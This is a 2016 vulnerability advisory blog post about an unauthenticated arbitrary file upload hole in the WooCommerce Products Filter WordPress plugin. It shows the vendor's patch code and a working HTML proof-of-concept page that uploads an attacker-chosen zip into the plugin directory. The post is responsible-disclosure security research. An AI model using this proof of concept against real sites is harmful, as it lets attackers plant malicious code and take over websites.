Login
8 Jul 2016

Arbitrary File Upload Vulnerability in WooCommerce Products Filter

The importance of the security of a website obviously varies widely, one type of website where security seems to be fairly important would be with eCommerce websites. When it comes to WordPress based eCommerce, one of the popular solutions is WooCommerce, (which we use on this website). WooCommerce introduces additional security risk, since by default it allows customers to create WordPress accounts and many vulnerabilities being found by us an others these days are only exploitable by someone logged into WordPress, for which a hacker would have hard time doing on many other WordPress websites. That issue lead us to do a quick check over some plugins that work with WooCommerce, through that we found a vulnerability that would allow anyone logged in to WordPress to change product prices and another in the plugin WooCommerce Products Filter that would allow anyone logged in to insert malicious JavaScript on to the website.

We then did a check over a larger group of plugins that are tagged woocommerce on the wordpress.org Plugin Directory for code patterns that could indicate a vulnerability exists in the plugin. In doing that we found an arbitrary file upload vulnerability in WooCommerce Products Filter. With that type of vulnerability a hacker could upload malicious code to the website and then they could basically anything they want with the website. That type of vulnerability is probably the most likely to be exploited, so finding one in a plugin with 10,000+ active installs (according to wordpress.org) was concerning. But it was better to catch that now then to catch it after a hacker discovered it and started exploiting it, as we have been repeatedly doing over the last couple of months.

The vulnerability stems from the functionality to upload custom extensions in .zip files. The uploading for that is handled through the file /lib/simple-ajax-uploader/action.php, which didn’t contain any restriction on who can access the upload functionality.

After we notified the developer of the vulnerability, they released version 1.1.5, which added code to check if the upload attempt was being done by someone who could manage_options (a capability only Administrator level users normally have):

5
6
7
8
9
10
11
12
13
14
15
16
17

//upload protection
if (isset($_SERVER['HTTP_ABSPATH']))
{
require($_SERVER['HTTP_ABSPATH'] . 'wp-load.php');
wp();
if (!current_user_can('manage_options'))
{
	return;
}
} else
{
return;
}

The plugin still doesn’t contain protection against cross-site request forgery (CSRF) for the uploaded, though.

Proof of Concept

The following proof of concept will upload the selected zip file and and put the zipped up file in it in to the directory /wp-content/plugins/woocommerce-products-filter/lib/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/jquery.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/ui/core.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/ui/widget.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/ui/mouse.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/ui/sortable.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader/SimpleAjaxUploader.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader/action.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/js/modernizr.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/js/plugin_options.js"></script>
</head>
<body>
<script>
 jQuery(function ($) {
 woof_init_ext_uploader("../", "http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader/action.php");
 });
</script>
<div id="pic-progress-wrap"></div>
<div id="errormsg"></div>
<input type="button" id="upload-btn" class="button" value="Choose a zip file">
</body>
</html>

Timeline

  • 7/5/2016 – Developer notified.
  • 7/7/2016 – Version 1.1.5 released, which fixes vulnerability.

No related posts.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Leave a Reply

Your email address will not be published. Required fields are marked *